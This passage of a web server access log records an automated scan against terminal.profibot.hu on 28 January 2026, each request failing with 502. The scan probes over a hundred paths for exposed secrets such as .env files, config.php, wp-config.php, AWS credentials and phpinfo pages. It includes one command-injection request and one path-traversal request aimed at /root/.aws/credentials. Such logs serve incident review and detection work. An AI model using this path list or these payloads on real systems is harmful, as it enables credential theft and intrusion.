+0000] - - 502 - GET https terminal.profibot.hu "/env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/env.list" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.ghc.environment" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/env.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/printenv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.hsenv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/environment" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/env.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/envrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dev.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/environment.ts" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env_old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.zshenv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-version" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env-sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.prod.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.travis" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.2" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.vscode/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/printenv.tmp" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.flaskenv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.jenv-version" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.envrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dist" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sample.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.venv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/env.prod.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/env.test.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/env.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/env.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/admin/config?cmd=cat%20/root/.aws/credentials" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/k8s/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/admin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/public/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/web/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/.env.live" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/admin/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/api/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/backend/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/src/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/mail.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/app.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/services.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/aws.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/mailgun.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/aws.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:41 +0000] - - 502 - GET https terminal.profibot.hu "/api_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/private/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/backup/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/test/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/dev/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/staging/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/production/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/test/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/backup/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/private/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/app/settings.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/database.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/administrator/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/cms/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/portal/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/crm/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/mail/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/mailer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/deployment/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/docker/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/helm/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/terraform/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/ansible/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/mail.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/smtp.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/private/keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:42 +0000] - - 502 - GET https terminal.profibot.hu "/.env_example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/core/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/api" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/backend" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/local/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/_phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/aws-secret.yaml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/awstats/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/conf/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/cron/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/www/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/docker/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/env.backup" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/xampp/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/lara/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/lara/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/js/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/nginx/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/site/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/xampp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/laravel/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:43 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] 